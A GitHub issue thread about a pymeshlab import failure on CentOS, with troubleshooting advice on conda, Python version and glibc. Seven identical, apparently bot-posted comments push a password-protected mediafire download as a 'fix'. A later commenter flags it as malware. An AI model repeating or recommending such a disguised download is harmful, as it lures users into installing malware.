### ISSUE TITLE
 pymeshlab  install problem in CentOS release 7.5 (Final)， how do i solve this problem, thank u! 

### ISSUE THREAD

**Issue by Value-Jack** [cnr-isti-vclab/PyMeshLab#390]
when i install pymeshlab    2023.12.post1 manual，it shows this problem

Python 3.11.9 (main, Apr 19 2024, 16:48:06) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pymeshlab
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/work/anaconda3/envs/unique3d/lib/python3.11/site-packages/pymeshlab/__init__.py", line 11, in <module>
    from .pmeshlab import *
ModuleNotFoundError: No module named 'pymeshlab.pmeshlab'
>>> 
KeyboardInterrupt
>>> 

this is my env:

torch                     2.4.0 
torchaudio                2.1.0
torchvision               0.16.0
python 3.11

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Value-Jack** [comment]
> to fix your trouble check this fix, i see it in another issue, https://app.mediafire.com/9mrkd33xulszl password: changeme when you installing, you need to place a check in install to path and select "gcc."

could you please show me more details, thank you!

**Comment by Value-Jack** [comment]
why are there so many robots？

**Comment by Salieri0515** [comment]
I notice that you're using conda, maybe try install pymeshlab out of conda envrionment?

**Comment by alister** [comment]
A Warning about the above reply and the link to malware on mediafire (from the author of Curl): https://mastodon.social/@bagder/113038399943924413

**Comment by Value-Jack** [comment]
> I notice that you're using conda, maybe try install pymeshlab out of conda envrionment?

but i need to pip install pymeshlab😭😭😭

**Comment by Salieri0515** [comment]
> > I notice that you're using conda, maybe try install pymeshlab out of conda envrionment?
> 
> but i need to pip install pymeshlab😭😭

Using `pip install` doesn't mean that you are required to activate a conda environment. My adivce is you should deactivate conda until you can't seee (base), then using pip install. That's exactly what I have done to successfully using pymeshlab.
 
![image](https://github.com/user-attachments/assets/d6aec16a-323f-4778-b7ba-b933ef9273ed)

**Comment by Value-Jack** [comment]
thank you! but my python version is only python 2.7.5 and will show this error, maybe the python version problem?
![image](https://github.com/user-attachments/assets/16331b19-5668-45a4-a71e-387b6561f9a2)

**Comment by Salieri0515** [comment]
It should be the problem. Python 2 doesn't support the `encoding` argument.

**Comment by johnnynunez** [comment]
> It should be the problem. Python 2 doesn't support the `encoding` argument. Also pay attention to the required python version for pymeshlab, which is python 3.7+ (you should check this).

I have the same problem using python3.10 without conda

**Comment by alemuntoni** [comment]
@Value-Jack what do you mean with "manual install"? Do you installed it trough pip?
Could you please check the version of glibc in your system? glibc installed on CentOS tend to be outdated and we cannot support them. See #157.
